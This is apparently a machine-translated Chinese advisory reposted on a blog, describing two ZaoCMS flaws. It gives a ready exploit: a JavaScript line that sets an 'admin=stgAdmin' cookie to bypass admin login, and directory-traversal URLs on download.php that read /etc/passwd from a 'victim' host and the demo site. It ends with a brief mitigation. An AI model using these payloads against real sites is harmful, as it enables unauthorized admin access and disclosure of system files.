ZaoCMS不安全cookie处理和本地文件共享

软件: ZaoCMS
描述:
两个漏洞报告了ZaoCMS ,可以利用此漏洞绕过某些安全限制,并披露敏感信息。

1 )申请不正确限制进入的管理界面。可利用此漏洞绕过认证机制,并获得行政部门的控制面板设置“admin” cookie来“ stgAdmin ” 。

2 )输入传递到“Directory”中的参数“admin/functions/ PhpCommander / download.php ”没有正确地验证之前被用来包括档案。可利用此漏洞下载任意文件从当地的资源。

漏洞利用:

———
admin/login.php
javascript:document.cookie="admin=stgAdmin;path=/";
Then Go To
admin/edit.php
demo:
——-
http://demo.zaocms.com/admin/login.php

———
http://wwww.victim.co.il/admin/functions/PhpCommander/download.php?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F
demo:
——-
http://demo.zaocms.com/admin/functions/PhpCommander/download.php?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F

解决方案:
限制访问“admin/”目录中(例如通过 .htaccess)

发表评论?

0 条评论。

发表评论